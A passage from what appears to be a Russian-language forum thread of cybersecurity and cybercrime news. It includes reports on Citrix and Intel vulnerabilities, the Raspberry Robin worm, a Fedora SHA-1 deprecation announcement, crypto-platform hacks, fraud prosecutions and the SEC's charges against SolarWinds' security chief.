Наибольшее количество затронутых IP-адресов находится в Германии, Франции, Швейцарии, Италии, Швеции, Испании, Японии, Китае, Австрии и Бразилии.
Компания Assetnote, которая обнаружила и сообщила об ошибке, проследила ее до более простой версии атаки оракула заполнения (Padding Oracle), которая позволяет раскрыть ключи шифрования.
Citrix не раскрыла дополнительных подробностей о данной уязвимости. Однако сейчас достоверно известно, что для успешной эксплуатации CVE-2023-3519 требуется, чтобы устройство было настроено как шлюз (виртуальный сервер VPN, ICA-прокси, CVPN, RDP-прокси) или виртуальный сервер авторизации и учёта (AAA).
Червь Windows недавно был обнаружен в сетях сотен организаций в различных отраслях промышленности, сообщила компания Microsoft.
Вредоносная программа, известная как Raspberry Robin, распространяется через зараженные USB-устройства, и впервые была обнаружена аналитиками Red Canary в сентябре 2021 года.
Фирма Sekoia, специализирующаяся на кибербезопасности, также заметила его использование устройств QNAP NAS в качестве командно-контрольных серверов (C2) в начале ноября, а компания Microsoft заявила, что обнаружила вредоносные артефакты, связанные с этим червем, созданным в 2019 году. ...
Хотя Microsoft заметила, что вредоносная программа подключается к адресам в сети Tor, хакеры еще не использовали их. ...
Компания Microsoft поделилась этой информацией в частном бюллетене по анализу угроз, распространенном среди пользователей Microsoft Endpoint Defense и попавшем в поле зрения bleepingcomputer[.]
"Raspberry Robin использует msiexec.exe для попыток внешних сетевых соединений, чтобы достичь вредоносных доменов в целях C2".
Исследователи безопасности, обнаружившие Raspberry Robin, пока не приписывают вредоносную программу конкретной хакерской группе и все еще работают над поиском конечной цели ее операторов.
Однако, учитывая, что злоумышленники могли в любой момент загрузить и развернуть в сети жертвы дополнительное вредоносное ПО и повысить свои привилегии, Microsoft отметила эту деятельность как высокорискованную.
https://www.bleepingcomputer[.]com/...y-robin-worm-in-hundreds-of-windows- networks/
В 20-страничном документе, представленном в воскресенье, 18 стран согласились, что компании, разрабатывающие и использующие ИИ, должны разрабатывать и внедрять его таким образом, чтобы защитить клиентов и широкую общественность от неправильного использования.
Соглашение не является обязательным и содержит в основном общие рекомендации, такие как мониторинг систем искусственного интеллекта на предмет злоупотреблений, защита данных от фальсификации и проверка поставщиков программного обеспечения.
Помимо США и Великобритании, в число 18 стран, подписавших новые рекомендации, входят Германия, Италия, Чехия, Эстония, Польша, Австралия, Чили, Израиль, Нигерия и Сингапур.

design' ](https://www.reuters.com/technology/us-britain-other-countries-ink- agreement-make-ai-secure-by-design-2023-11-27/)
In a 20-page document unveiled Sunday, 18 countries agreed that firms designing and using AI need to develop and deploy it in a way that keeps customers and the wider public safe from misuse.
www.reuters.com
Житель американского города Клермонт (штат Северная Каролина) приговорен к шести годам тюрьмы и еще двум годам надзора за мошенничество с заявками на получение средств из ковидных фондов.
36-летний Спенсер Денар Рикерсон (Spenc’r Denard Rickerson) суммарно украл почти 85 тысяч долларов, однако будет вынужден, проведя время за решеткой, также выплатить реституцию в размере 87 тысяч долларов.
Согласно судебным документам и доказательствам, представленным в ходе процесса, в период с июня 2020-го по март 2021 года Рикерсон использовал ложную информацию для подачи заявки на получение ссуды в рамках Программы защиты зарплаты (PPP) и нескольких ссуд на случай причинения экономического ущерба (EIDL), гарантированных Управлением малого бизнеса США (SBA) в соответствии с Законом о помощи и экономической безопасности в связи с коронавирусом (CARES). Установлено, что в первом случае он выступал от имени несуществующей компании, а во втором — предоставил выдуманные сведения о количестве сотрудников организации и ее валовой выручке.
Однако обо всех этих случаях мошенничества следствие узнало, раскручивая другое преступление Рикерсона. В марте 2021 года он совершил вооруженное ограбление банка. В дальнейшем украденные средства были потрачены на оплату долгов, коммунальных счетов и покупку криптовалюты.
source: whky.com/claremont-man-sentenced-in-federal-case-involving-fraud-bank- robbery
Платформа балансировки ликвидности Conic Finance для децентрализованного финансового протокола Curve подверглась атаке хакеров в сети Ethereum omnipool.
По данным источника оповещения о рисках в сфере Web3 Beosin Alert, из Conic Finance было похищено криптовалюты Ether на сумму 3,26 млн долларов. Практически вся украденная криптовалюта в одной транзакции была отправлена на новый кошелек в блокчейне Ethereum.
Разработчики Conic Finance оперативно подтвердили факт взлома в Twitter, сообщив, что ведут расследование инцидента и обещали поделиться подробностями, как только они появятся.
Согласно предварительному анализу компании по кибербезопасности в сфере блокчейна Peckshield, причиной атаки стала уязвимость в недавно введённом контракте CurveLPOracleV2.
Примерно через час после первых сообщений об атаке команда Conic Finance отключила депозиты в ETH Omnipool на своём фронтенде.
Впоследствии разработчики Curve Finance, отслеживавшие ситуацию, подтвердили, что проблема затронула только пул ETH omnipool.
Хакерские атаки на децентрализованные финансы далеко не редкость в этой сфере. По данным приложения для веб3-портфеля De.Fi, только во втором квартале 2023 года из-за хакерских атак и мошенничества в DeFi было похищено более 204 млн долларов. При этом потери оказались меньше, чем в первом квартале - тогда, по оценкам CertiK, жертвами киберпреступников стали свыше 320 млн долларов.
Разработчики проекта Fedora наметили план отключения поддержки цифровых подписей на основе алгоритма SHA-1 в Fedora Linux 39. (https://fedoraproject.org/wiki/Changes/StrongCryptoSettings3)
Spoiler: mail
Code:Copy to clipboard
== Summary ==
Cryptographic policies will be tightened in Fedora ''38''-39,
SHA-1 signatures will no longer be trusted by default.
Fedora ''38'' will do a "jump scare", introducing the change but then
reverting it in time for Beta.
Test your setup with TEST-FEDORA39 today and file bugs in advance so
you won't get bit by Fedora ''38''-39.
== Owner ==
* Name: [[User:Asosedkin| Alexander Sosedkin]]
* Email: asose...@redhat.com
== Detailed Description ==
Secure defaults are an evermoving target.
Fedora 28 had [[Changes/StrongCryptoSettings|StrongCryptoSettings]].
Fedora 33 had [[Changes/StrongCryptoSettings2|StrongCryptoSettings2]].
Fedora 39 should have [[Changes/StrongCryptoSettings3|StrongCryptoSettings3]].
By Fedora 39, the policies will be, in TLS perspective:
LEGACY
MACs: All HMAC with SHA1 or better + all modern MACs (Poly1305 etc.)
Curves: all prime >= 255 bits (including Bernstein curves)
Signature algorithms: SHA-1 hash or better (no DSA)
Ciphers: all available > 112-bit key, >= 128-bit block (no RC4 or 3DES)
Key exchange: ECDHE, RSA, DHE (no DHE-DSS)
DH params size: >=2048
RSA params size: >=2048
TLS protocols: TLS >= 1.2
DEFAULT
MACs: All HMAC with SHA1 or better + all modern MACs (Poly1305 etc.)
Curves: all prime >= 255 bits (including Bernstein curves)
Signature algorithms: with SHA-224 hash or better (no DSA)
Ciphers: >= 128-bit key, >= 128-bit block (AES, ChaCha20, including AES-CBC)
Key exchange: ECDHE, RSA, DHE (no DHE-DSS)
DH params size: >= 2048
RSA params size: >= 2048
TLS protocols: TLS >= 1.2
FUTURE
MACs: All HMAC with SHA256 or better + all modern MACs (Poly1305 etc.)
Curves: all prime >= 255 bits (including Bernstein curves)
Signature algorithms: SHA-256 hash or better (no DSA)
Ciphers: >= 256-bit key, >= 128-bit block, only Authenticated
Encryption (AE) ciphers
Key exchange: ECDHE, DHE
DH params size: >= 3072
RSA params size: >= 3072
TLS protocols: TLS >= 1.2
The flagship change this time will be distrusting SHA-1 signatures
on the cryptographic library level, affecting more than just TLS.
OpenSSL will start blocking signature creation and verification by default,
with the fallout anticipated to be wide enough
for us to roll out the change across multiple cycles
with multiple forewarnings
to give developers and maintainers ample time to react:
Fedora 36:
* SHA-1 signatures are distrusted in FUTURE policy (opt-in)
* TEST-FEDORA39 policy is provided
* creating and verifying SHA-1 signatures is logged to ease reporting bugs
Fedora 37
[[Changes/StrongCryptoSettings3Forewarning3|StrongCryptoSettings3Forewarning1]]:
* (was initially reserved to implement logging of SHA-1 signature operations)
'''Fedora 38
[[Changes/StrongCryptoSettings3Forewarning3|StrongCryptoSettings3Forewarning2]]''':
* policies are updated, most notably
* SHA-1 signatures are distrusted in DEFAULT policy
* changes are reverted in branched f38 in time for Beta and do not reach users
Fedora 39 [[Changes/StrongCryptoSettings3|StrongCryptoSettings3]]:
* changes reach users
The plan is subject to change if it goes sideways somewhere along the way.
So, in Fedora 36, 37 and ''38 released'' distrusting SHA-1 signatures
will be opt-in.
In ''Fedora 38 rawhide'' and Fedora 39 distrusting SHA-1 signatures
will happen by default.
== Feedback ==
[https://lists.fedoraproject.org/archives/list/de...@lists.fedoraproject.org/thread/VVLHQAWI3IQ7NRLKMUHJ27JV3V2JAFDP
A discussion]
has been raised on fedora-devel,
[https://lwn.net/Articles/887832 a summary] is available on LWN.
A change has the potential to prove disruptive and controversial,
with much effort being focused on stretching it out in time.
There seems to be a consensus that the change has to be done eventually,
but the ideal means of implementing it are in no way clear.
The decision to discover code reliant on SHA-1 signatures
by blocking creation/verification has not gathered many fans,
but not many alternative proposals have been raised in return.
A notable one, making the library somehow log the offending operations,
has been incorporated in the proposal,
though the effectiveness of it is yet to be seen in practice.
Another notable takeaway point is the need to call for testing,
which would be done in form of writing four Fedora Changes
and testing SHA-1 signature distrusting during Fedora 37 & ''38'' Test Days.
The change owner doesn't see the plan as an ideal one
and continues to be open for feedback.
== Benefit to Fedora ==
Fedora 39 will ship with more secure defaults
to better match the everchanging landscape of cryptographic practices.
TLS 1.0 / 1.1 protocol version will be disabled
as they're [https://datatracker.ietf.org/doc/rfc8996 deprecated],
minimum key sizes will be raised to keep up with the computational advances etc.
Distrusting SHA-1 signatures specifically is expected to trigger
a topical distribution-wide crackdown
on [https://eprint.iacr.org/2020/014 weak] cryptography,
raising the security of the distribution moving forward.
== Scope ==
* Proposal owners: implement changes described in Summary and
Dependencies sections
* Other developers:
Test your applications with TEST-FEDORA39 policy.
Move away from trusting SHA-1 signatures;
ideally in time for F38 branch-off,
for F39 release at the latest.
Follow [[SHA1SignaturesGuidance | SHA1SignaturesGuidance]]:
1. move away from trusting SHA-1 signatures entirely, or
2. distrust them by default and require explicit user opt-in to use a workaround
* Release engineering: Not sure if mass-rebuild is required if we
land the change right after f38 branch-off. Maybe a "preview"
mass-rebuild can be done with a special build in the F37 timeframe to
cut down on F38 FTBFS.
* Policies and guidelines: update needed
CryptoPolicies section of the packaging guidelines
will have to be updated to reflect that
SHA-1 signatures must not be trusted by default
and provide guidance for openssl and gnutls.
Components using workaround APIs must not use them without explicit user opt-in
and must be added to a list of applications using a workaround API.
* Trademark approval: N/A (not needed for this Change)
* Alignment with Objectives: not with Fedora 37-era ones
== Upgrade/compatibility impact ==
See "User experience".
Upgrade-time issues aren't specifically anticipated;
if any were to arise, testing should find them in ''Fedora 38''-times,
to be fixed by Fedora 39 release at the latest.
Administrators willing to sacrifice security
can apply LEGACY or FEDORA38 policies.
== How To Test ==
=== Testing actively ===
On a ''Fedora 38 rawhide'' system,
install crypto-policies-scripts package and switch to a more restrictive policy
with `update-crypto-policies --set TEST-FEDORA39`.
Proceed to use the system as usual,
identify the workflows which are broken by this change.
Verify that the broken functionality works again
if you the policy is relaxed back
with, e.g., `update-crypto-policies --set TEST-FEDORA39:SHA1`,
file bug reports against the affected components if not filed already.
Please start your ticket title with `StrongCryptoSettings3: `,
mention this change page, the version of crypto-policies package
and the policies under which your workflow does and does not work.
Especially brave souls can dare to try
`update-crypto-policies --set FUTURE` instead,
though this policy is more aggressive than the upcoming defaults.
=== Testing passively ===
On a ''Fedora 38 released'' system, install a special logging tool from
https://copr.fedorainfracloud.org/coprs/asosedkin/sha1sig-tracer
Run it and proceed to use your system.
Once the tool notifies you about
about soon-to-be-blocked SHA-1 signature operations,
identify the component and actions leading to these operations,
verify that repeating them leads to logging more entries.
Ideally also verify that switching to a stricter policy breaks the workflow.
File bug reports against the affected components if not filed already.
Please start your ticket title with `StrongCryptoSettings3: `
and link to this change page.
== User Experience ==
Things will break.
All kinds of things depending on SHA-1 signatures, openly and secretly.
* On Fedora 36-37 they'll break opt-in.
* '''On Fedora 38 rawhide they'll break by default.'''
* '''On Fedora 38 released they'll behave like in Fedora 37.'''
* On Fedora 39 they'll break by default again, including the released version.
== Dependencies ==
A small coordinated change with openssl is required.
In Fedora 38,
openssl should start distrusting SHA-1 signatures
when used with no configuration file.
This does not affect the majority of scenarios,
only applications that do not follow system-wide cryptographic policies.
All reverse dependencies of core cryptographic libraries are affected,
especially openssl ones relying on SHA-1 signatures.
== Contingency Plan ==
* Contingency mechanism: not needed for F38, change will be reverted
before Beta anyway
* Contingency deadline: not needed for F38, change will be reverted
before Beta anyway
* Blocks release? No
== Documentation ==
Workaround API
should be added to [[SHA1SignaturesGuidance | SHA1SignaturesGuidance]].
Packaging guidelines should be modified accordingly.
== Release Notes ==
To be done, similarly to
https://pagure.io/fedora-docs/release-notes/issue/829
--
Ben Cotton
He / Him / His
Fedora Program Manager
Red Hat
TZ=America/Indiana/Indianapolis
_______________________________________________
devel-announce mailing list -- devel-announce@lists.fedoraproject.org
To unsubscribe send an email to devel-announce-le...@lists.fedoraproject.org
Fedora Code of Conduct:
https://docs.fedoraproject.org/en-US/project/code-of-conduct/
List Guidelines: https://fedoraproject.org/wiki/Mailing_list_guidelines
List Archives:
https://lists.fedoraproject.org/archives/list/devel-announce@lists.fedoraproject.org
Do not reply to spam, report it:
https://pagure.io/fedora-infrastructure/new_issue
Отключение предполагает прекращение доверия к подписям, в которых используются хэши SHA-1 (в качестве минимально поддерживаемого в цифровых подписях будет заявлен SHA-224), но сохранение поддержки HMAC с SHA-1 и предоставлении возможности включить LEGACY-профиль с SHA-1.
После применения изменений библиотека OpenSSL по умолчанию начнёт блокировать генерацию и проверку подписей с SHA-1.
Отключение планируется провести в несколько этапов: В Fedora Linux 36 и 37 подписи на основе SHA-1 будут исключены из политики "FUTURE", предоставлена тестовая политика TEST-FEDORA39 для отключения SHA-1 по желанию пользователя (update-crypto-policies --set TEST-FEDORA39), при создании и верификации подписей на основе SHA-1 в логе будут отображаться предупреждения.
В процессе подготовки выпуска Fedora Linux 38 до формирования бета-версии в репозитории rawhide будет применена политика, запрещающая использование подписей на основе SHA-1, но в бета-выпуске и релизе Fedora Linux 38 это изменение применяться не будет. В выпуске Fedora Linux 39 политика с прекращением поддержки подписей на основе SHA-1 будет применена по умолчанию.
Предложенный план пока не рассмотрен комитетом FESCo (Fedora Engineering Steering Committee), отвечающим за техническую часть разработки дистрибутива Fedora. Прекращение поддержки подписей на основе SHA-1 обусловлено повышением эффективности коллизионных атак с заданным префиксом (стоимость подбора коллизии оценивается в несколько десятков тысяч долларов). В браузерах сертификаты, заверенные с использованием алгоритма SHA-1, помечаются как незащищённые с середины 2016 года.
Intel выпустила исправлений для множества уязвимостей в линейке своих продуктов, в том числе для ряда серьезных уязвимостей в прошивке BIOS процессоров.
В общей сложности 10 серьезных ошибок затрагивают несколько процессоров Intel Xeon, Pentium Silver, Rocket Lake Xeon, Core и Core X. Наиболее серьезными из них являются 4 ошибки, которые могут привести к повышению привилегий через локальный доступ: CVE-2021-0154, CVE-2021-0153, CVE-2021-33123 и CVE-2021-0190, имеют оценку CVSS 8,2.
Остальные 5 уязвимостей высокой степени серьезности, [описанные в опубликованном бюллетене](https://www.intel.com/content/www/us/en/security- center/advisory/intel-sa-00601.html), также могут привести к эскалации привилегий через локальный доступ, но имеют несколько более низкие оценки CVSS. В бюллетене Intel также описаны 2 баги средней степени серьезности.
Кроме того, Intel исправила серьезную ошибку в Boot Guard и Trusted Execution Technology (TXT). Они отслеживается как CVE-2022-0004 и имеет оценку CVSS 7,3. Уязвимость может быть использована для повышения привилегий в уязвимой системе.
Режимы аппаратной отладки и настройка процессора INIT, которые позволяют переопределять блокировки для некоторых процессоров в Intel Boot Guard и Intel TXT, могут позволить пользователю, не прошедшему проверку подлинности, потенциально включить эскалацию привилегий посредством физического доступа.
Проблема затрагивает несколько моделей процессоров Intel, в том числе последние три поколения процессоров Intel Core, некоторые модели Celeron, Atom, Pentium, Xeon, Gold и Silver, а также наборы микросхем нескольких серий.
Компания рекомендует обновить Intel Converged Security and Management Engine (CSME) до последней версии, отключить функцию отладки ЦП при включенном Boot Guard, а также деактивировать бит BSP (Bootstrap Processor) INIT (DBI).
Производитель опубликовал рекомендации для восьми уязвимостей в продуктах Optane SSD и Intel Optane SSD Data Center (DC), в том числе 3 с рейтингом высокой серьезности и 5 - средней.
В числе прочих [исправлены](https://www.intel.com/content/www/us/en/security- center/default.html) серьезные дыры в безопасности прошивки NUC и программном обеспечении In-Band Manageability, а также ошибки средней степени серьезности в Advisor, XTU, Killer Control Center, Manageability Commander и платформе SGX.
В сервисе непрерывной интеграции Travis CI, предназначенном для тестирования и сборки проектов, разрабатываемых на GitHub и Bitbucket, выявлена проблема с безопасностью ([CVE-2021-41077](https://security- tracker.debian.org/tracker/CVE-2021-41077)), позволяющая узнать содержимое конфиденциальных переменных окружения публичных репозиториев, использующих Travis CI. В том числе уязвимость позволяет узнать используемые в Travis CI ключи для формирования цифровых подписей, ключи доступа и токены для обращения к API.
Проблема присутствовала в Travis CI с 3 по 10 сентября. Примечательно, что информация об уязвимости была передана разработчикам 7 сентября, но в ответ была лишь получена отписка с рекомендацией использовать ротацию ключей. Не получив должной обратной связи исследователи связались с GitHub и предложили занести Travis в чёрный список. Проблема была устранена лишь 10 сентября после большого числа поступивших жалоб от разных проектов. После инцидента на сайте компании Travis CI был опубликован более чем странный отчёт о проблеме, в котором вместо информирования об исправлении уязвимости, содержалась лишь указанная вне контекста рекомендация циклично менять ключи доступа.
После возмущения сокрытием сведений, высказанным несколькими крупными проектами, в форуме поддержки Travis CI был [опубликован](https://travis- ci.community/t/security-bulletin/12081) более подробный отчёт, в котором предупреждалось, что владелец форка любого публичного репозитория через отправку pull-запроса мог инициировать процесс сборки и получить неавторизированный доступ ко всем [переменным окружения](https://docs.travis- ci.com/user/encryption-keys) исходного репозитория, выставляемым во время сборки на основе полей из файла ".travis.yml" или определяемым через web- интерфейс Travis CI.
В том числе передавались и непубличные переменные окружения, содержащие ключи и токены, используемые для создания цифровых подписей или доступа ко внешним хранилищам, API и сервисам во время сборки. Подобные переменные хранятся в зашифрованном виде и расшифровываются только во время сборки. Проблема касалась только публично доступных репозиториев у которых есть форки (приватные репозитории не подвержены атаке). Напомним, что весной похожая проблема с утечкой закрытых переменных окружения из-за добавления бэкдора в скрипт сервиса Codecov, запускаемого во время сборки в системах непрерывной интеграции, привела к утечке ключей многих компанией и проектов, в том числе атакующие получили доступ к PGP-ключу компании HashiCorp, используемому для верификации релизов.
Разработчик NFT-коллекции Mutant Ape Planet — подделки Mutant Ape Yacht Club — признал себя виновным в обмане покупателей через реализацию схемы rug pull, которая принесла $3 млн.
В январе власти США предъявили обвинение в мошенничестве 24-летнему гражданину Франции Орельену Мишелю. По словам прокурора Восточного округа Нью-Йорка, ему грозит до пяти лет тюремного заключения, и он согласился выплатить $1,4 в виде возмещения ущерба.
«Орельен Мишель соблазнил инвесторов обещаниями извлечь выгоду из NFT-тренда, но отказался от проекта после того, как накопил почти $3 млн в так называемой rug pull. Обвиняемый во введении в заблуждение NFT-сообщества обезьян- мутантов, заявлял о своей невиновности и даже назвал жертв “слишком токсичными”», — заявил спецагент HSI Айван Арвело.
Согласно представленным в суде документам, Мишель с сообщниками продавал коллекционные токены покупателям, ложно обещая многочисленные вознаграждения и льготы, которые повысят стоимость активов. Но обвиняемый намеренно не выполнил обещания, направив миллионы долларов на личное потребление.
По данным OpenSea, 7880 токенов коллекции продолжают торговаться. Однако средняя цена Mutant Ape Planet обвалилась с максимальных 3,25 ETH в январе до 0,06 ETH по состоянию на 13 ноября.
source: twitter.com/EDNYnews/status/1724486706710077706
Специалист по блокчейн-безопасности ZachXBT первым обнаружил атаку на горячие кошельки Ethereum, Bitcoin и TRON компании.
Эксперты из PeckShield, фирмы, специализирующейся на безопасности блокчейна, подтвердили данные о взломе. Согласно их отчету, злоумышленники украли 6,074 миллиона USDT, 108 тысяч USDC, 100,2 миллиона FTN, 430 тысяч TFL, 2,5 тысячи ETH и 1,700 DAI, переведя все средства на адрес 0x040a.
В ходе операции преступники обменяли похищенные стейблкоины на 5,73 ETH, которые затем были конвертированы в BTC через Avalanche Bridge. Также было выведено около 12 миллионов USDT и 5,2 миллиона TRX, последовательно перечисленных на TKSitn и TDoNAZHa7.
Поскольку Alphapo предоставляет платежные услуги для ряда известных криптовалютных игровых площадок, включая HypeDrop, Ignition и Bovada, последствия взлома могут быть значительными.
В связи с этим инцидентом HypeDrop временно приостановил операции по вводу и выводу некоторых криптовалют. Отвечая на вопросы пользователей, компания объяснила проблемы действиями неуказанного третьего лица. При этом HypeDrop подчеркнул, что у третьего лица возникли сложности с операциями по BTC, ETH и TRX, уверяя своих клиентов в безопасности средств.
Криптовалютный маркетмейкер Wintermute объявил, что пострадал от хакерской атаки, в ходе которой злоумышленники сумели похитить более 160 миллионов долларов.
Компания уверяет, что остается платежеспособной, однако в ближайшие время могут возникнуть перебои в обслуживании, так как будут вестись работы по восстановлению. Подчеркивается, что Cefi- и OTC-операции атака не затронула.
Маркетмейкер Wintermute обеспечивает ликвидность более чем на 50 криптовалютных платформах и биржах, включая такие ресурсы, как Binance, Coinbase, Kraken и Bitfinex.
Глава Wintermute Евгений Гаевой заявил, что в компании готовы рассматривать случившееся как whitehat-инцидент. То есть представители маркетмейкера готовы выплатить взломщику вознаграждение за успешное обнаружение и эксплуатацию уязвимости без каких-либо юридических последствий. Однако пока неясно, заинтересован ли сам злоумышленник в возвращении украденных у Wintermute средств.
Известно, что в кошельке хакера в настоящее время хранятся активы на сумму около 47,7 миллионов долларов. Остальные средства выведены в пул ликвидности Curve Finance «3CRV», где их будет трудно отследить или заморозить.
Хотя пока технических подробностей о самой атаке мало, ИБ- эксперты и Гаевой считают, что, вероятнее всего, злоумышленник использовал баг в инструменте Profanity, для которого уже существует доступный [PoC- эксплоит](https://blog.1inch.io/a-vulnerability-disclosed-in-profanity-an- ethereum-vanity-address-tool-68ed7455fc8c). Profanity представляет собой генератор удобочитаемых Ethereum-адресов (так называемые vanity-адреса), содержащих слова, имена или фразы. Причем автор проекта забросил его еще несколько лет назад.
Нужно сказать, что аналитики, которые недавно обнаружили уязвимость Profanity, [заявляли](https://cointelegraph.com/news/profanity-tool-vulnerability- drains-3-3m-despite-1inch-warning), что злоумышленники уже использовали ее для кражи примерно 3,3 миллиона долларов. Они призывали всех как можно скорее отказаться от использования Profanity, не хранить средства в кошельках, созданных с помощью этого проекта, и немедленно переместить активы в другое место.
](https://www.computerweekly.com/news/252524656/Hotel-group-IHG-confirms- cyber-attack-after-two-day-outage)
IHG, the operator of hotel chains Crowne Plaza, Holiday Inn, Intercontinental and Kimpton, says it has been targeted by an unknown threat actor.
www.computerweekly.com
"Лаборатория Касперского" дорабатывает функционал своего защищенного от взломов мобильного телефона для работы с критической инфраструктурой - необходимо еще наладить работу камеры и повысить производительность устройства, заявил РИА Новости генеральный директор компании Евгений Касперский в кулуарах форума "Армия-2022".
Впервые о работе над созданием смартфонов под собственной маркой с защитой от хакеров Касперский заявил в декабре 2020 года, тогда предполагалось, что они появятся в 2021 году.
Там еще не до конца готов функционал. … Мы писали все с самого нуля, поэтому еще нужно доделывать. Камера не работает. Мы делаем, но это требует времени. Плюс производительность - там еще есть работа, чтобы он работал с той же скоростью, к чему мы привыкли. Там куча всяких технических проблем, с которыми мы потихонечку справляемся. Когда мы его покажем и скажем, что вот, готово - не знаю
Click to expand...
По словам Касперского, устройство будет чем-то средним между обычным
смартфоном и кнопочным телефоном.
"При этом мы не рассматриваем его как замену обычному смартфону. Все-таки это
больше для работы с критической инфраструктурой. … Современность требует того,
чтобы управлять инфраструктурой можно было и удаленно. Поэтому требуется
устройство, которое будет гарантируемо невзламываемо. Поэтому мы делаем такое
устройство, у которого будет достаточно ограниченный функционал. Там не будет
App Store, там не будет фишек, которые все любят на смартфонах, но это будет
штука, которой можно будет безопасно управлять условной турбиной", - добавил
Касперский.
Хакеры взломали учетную запись премьер-министра Австралии Скотта Моррисона в китайской соцсети WeChat и изменили ее содержимое, передает телеканал ABC.
Название учетной записи было переименовано в «Новая жизнь австралийских китайцев», а ее содержание было представлено как «Предоставление информации о жизни в Австралии для китайской общины».
Председатель парламентской комиссии по разведке и безопасности Джеймс Патерсон заявил, что за этим стоят китайские власти. По его словам, платформа WeChat якобы используется для слежки за китайцами, которые проживают за границей.
«Сотрудниками Главного управления МВД России по Московской области совместно с коллегами из Рузского городского округа задержан уроженец Республики Нигерия, подозреваемый в мошенничестве.
Предварительно установлено, что злоумышленник зарегистрировался на одном из сайтов знакомств под женским именем. В ходе переписки с жителем подмосковного поселка Тучково он рассказал выдуманную историю о том, что живет в США, но в данный момент проходит службу медработницей в Сирийской Арабской Республике. Там якобы остались ценные вещи и деньги, которые никак не получается вывезти. Мнимая медсестра попросила помощи в оплате и получении отправления с вещами. Мужчина согласился.
В дальнейшем аферист отправил новому знакомому фотографию поддельной квитанции об отправке вещей в Россию. А через некоторое время сам вышел на связь с мужчиной и теперь уже представился курьером транспортной компании. Он сообщил, что за прибывшую посылку нужно заплатить около 1,5 тысяч долларов США. Потерпевший занял деньги у знакомого, перечислил на указанные счета, после чего злоумышленник перестал выходить на связь.
Следователем отдела МВД России по Рузскому городскому округу возбуждено уголовное дело по признакам преступления, предусмотренного статьей 159 УК РФ.
В результате оперативно-розыскных мероприятий сотрудники полиции установили подозреваемого и при участии Росгвардии задержали его в городском округе Балашиха. В ходе осмотра места его проживания обнаружены и изъяты мобильные телефоны, сим-карты, банковские карты и другие предметы, имеющие доказательственное значение для уголовного дела.
В настоящее время фигуранту избрана мера пресечения в виде заключения под стражу. Предварительное расследование продолжается», - сообщила официальный представитель МВД России Ирина Волк.
Сотрудники Управления по борьбе с киберпреступностью ГУ МВД России по городу Санкт-Петербургу и Ленинградской области совместно с коллегами из УМВД России по Фрунзенскому району пресекли деятельность организованной группы, участники которой подозреваются в неправомерном обороте средств платежей.
Установлено, что в марте этого года 21-летний житель Северной столицы за денежное вознаграждение в размере 1 500 рублей отдал бывшему однокласснику свою банковскую карту и сим-карту от телефона с доступом к личному кабинету онлайн-приложения финансового учреждения.
В дальнейшем на счёт владельца кредитки поступили 624 тысячи рублей, похищенные телефонными мошенниками у жительницы Тульской области. Аферисты убедили женщину, что её безналичным сбережениям грозит опасность, в связи с чем деньги нужно перевести на безопасный номер. По задумке злоумышленников, в последующем похищенные свыше полумиллиона рублей должны были отправиться на другие подконтрольные им счета, однако подозрительная транзакция была заблокирована специалистами банка.
Выяснив личность собственника карты, на которой находились «замороженные» финансы, полицейские узнали у него, кому он её передал. Покупателем оказался 21-летний житель Санкт-Петербурга. Молодой человек был задержан. Оказалось, что он на протяжении длительного времени скупал платёжные средства своих знакомых и просто случайных граждан, а затем передавал кредитки в распоряжение своим товарищам, 22-летнему студенту одного из престижных вузов города на Неве и 21-летнему неработающему приятелю, временно проживающим в Сочи.
Далее их общая 21-летняя знакомая из Выборгского района Северной столицы отправляла неизвестному лицу в мессенджере реквизиты этих банковских карт, на которые впоследствии поступали деньги жертв телефонных мошенников. Эти финансы девушка конвертировала и переводила на криптокошельки сообщников.
Сотрудники полиции задержали подозреваемых в неправомерном обороте средств платежей и по местам их жительства изъяли мобильные телефоны, ноутбуки, оформленные на третьих лиц кредитки и сим-карты, а также договоры и доверенности на право распоряжения чужими финансовыми счетами.
В отношении молодых людей следователями СУ УМВД России по Фрунзенскому району Санкт-Петербурга возбуждено уголовное дело по признакам преступления, предусмотренного частью 2 статьи 187 Уголовного кодекса Российской Федерации. Троим фигурантам уже предъявлено обвинение и избрана мера пресечения в виде заключения под стражу. Их подельница и установленный продавец своей банковской карты отпущены под подписку о невыезде и надлежащем поведении. Расследование продолжается.
Чем грозит полуправда, когда речь идёт о многомиллиардных инвестициях.
Вчера вечером комиссия по ценным бумагам и биржам США (SEC) сделала официальное заявление , в котором обвинила Тимоти Брауна, главу службы информационной безопасности компании SolarWinds, в обмане инвесторов и вводе их в заблуждение касательно практик кибербезопасности компании.
В поданной в Южном округе Нью-Йорка жалобе утверждается, что Браун нарушил положения о борьбе с мошенничеством Закона о ценных бумагах 1933 года и Закона об обмене ценными бумагами 1934 года.
SEC требует наложения на Брауна постоянного судебного запрета, возврата незаконно полученных средств с процентами, гражданских санкций, а также запрета на занятие Брауном руководящих должностей в других компаниях.
В течение нескольких месяцев SEC намекала на намерение предъявить обвинения руководителям SolarWinds за их роль в кибератаке, которая продолжалась почти два года. Злоумышленники тогда внедрили вредоносное ПО в фирменное приложение Orion, необходимое для мониторинга IT-систем, что позволило иностранным хакерам проникнуть в десятки американских ведомств и свободно выгружать из них конфиденциальные данные.
По данным SEC, с момента выхода SolarWinds на IPO в октябре 2018 года и до объявления в декабре 2020 года о хакерской атаке, компания предоставляла инвесторам лишь общие сведения о рисках, в то время как руководство компании, включая Брауна, были осведомлены о конкретных недостатках в практиках кибербезопасности и возросших рисках.
Вместо устранения этих уязвимостей SolarWinds и Браун, по утверждению SEC, начали кампанию по созданию ложного представления о среде управления киберконтролем в SolarWinds, лишая инвесторов точной информации. Действия SEC не только предъявляют обвинения SolarWinds и Брауну в введении инвесторов в заблуждение и пренебрежительному отношению к защите важнейших активов компании, но и подчёркивают послание эмитентам: необходимо внедрять сильные контрольные меры, соответствующие рискам окружения, и быть открытыми перед инвесторами относительно известных проблем.
Представитель SolarWinds, в свою очередь, выразил разочарование в связи с «беспочвенными обвинениями» со стороны SEC. Адвокат Брауна заявил от его имени, что тот «с добросовестностью и высокой степенью ответственности постоянно работал над улучшением кибербезопасности компании».
SEC указывает на внутренние отчёты, которые свидетельствуют о том, что Браун был осведомлён о проблемах с кибербезопасностью в компании, но не предпринял шагов по их устранению или не сообщил о них на более высоком уровне. Комиссия также отмечает, что раскрытие информации о кибератаке в декабре 2020 года было неполным.
В прошлом году SolarWinds уже выплатила $26 миллионов в рамках урегулирования исков акционеров, связанных со скандалом из-за взлома, однако, похоже, на этом история не заканчивается.
На просторах всемирной паутины потерпевший увидел объявление, перешёл по ссылке и оставил свой номер телефона для связи.
